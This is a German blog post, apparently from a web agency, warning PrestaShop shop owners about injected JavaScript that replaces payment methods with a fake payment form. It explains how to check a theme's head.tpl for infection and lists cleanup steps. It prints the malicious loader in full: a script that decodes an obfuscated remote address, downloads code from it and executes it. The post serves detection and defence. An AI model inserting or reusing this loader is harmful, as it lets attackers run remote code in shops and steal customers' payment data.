Schlagwort: PrestaShop Malware

Veröffentlicht am

PrestaShop: Warnung vor Schadcode

Eine neue Warnung von PrestaShop wurde per E-Mail an viele Online-Shops versendet, dass derzeit Malware im Umlauf ist.
Wir erklären den Inhalt und was der Schadcode auslösen kann.

Schadcode im Shop erkennen

Der Schadcode wird innerhalb von PrestaShop per Javascript eingeschleust und ersetzt die Zahlungsarten durch eine gefälschte Zahlungsmaske.
Optisch ist das nicht immer einfach zu erkennen, da oftmals bekannte Zahlungsarten wie PayPal ebenfalls aufgelistet werden.

Ob Malware vorhanden ist, kann selbstständig geprüft werden.
Der Code kann direkt im Quellcode des Onlineshops oder via FTP über den folgenden Pfad abgerufen werden: root/themes/mytheme/_partials/head.tpl

Danach ganz einfach nach dem folgenden Code suchen und prüfen, ob er sichtbar ist:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Ist der Code nirgendwo sichtbar? Dann ist Ihr Shop nicht betroffen und Sie können das Thema ablegen.
Ist der Code sichtbar? Dann sollten Sie zwingend aktiv werden!

Offizielle PrestaShop Meldung:
https://help-center.prestashop.com/hc/en-us/articles/33259937046034-Security-Alert-Recommended-Verification-of-Your-Stores

Schadcode richtig bereinigen

  1. Zahlungen überprüfen
    Zuerst sollten Sie überprüfen, wie lange der Schadcode bereits aktiv ist und ob Zahlungen betroffen sind.
    Überprüfen Sie, ob Sie die Zahlungen der letzten Kunden erhalten haben oder ob bereits Daten abgefangen wurden.
  2. FTP Passwort
    Es kommt immer wieder vor, dass einfache FTP Passwörter geknackt und missbraucht werden.
    Ändern Sie das Passwort Ihres FTP-Accounts, damit hier kein Zugriff mehr möglich wäre.
  3. Module überprüfen
    Können Sie per FTP Module erkennen, welche ungewöhnliche Aktivitäten aufweisen oder erst gerade ohne Ihr Wissen aktualisiert wurden?
    Dann ist dies ein Hinweis, dass ein Modul der Schlüssel zum Einfallstor sein könnte.

Gibt es Unsicherheiten, woher jemand in Ihre Daten eingedrungen sein könnte?
Gerne können Sie uns jederzeit kontaktieren, wir überprüfen die Daten in einem fest vereinbarten Zeitrahmen und Kostendach.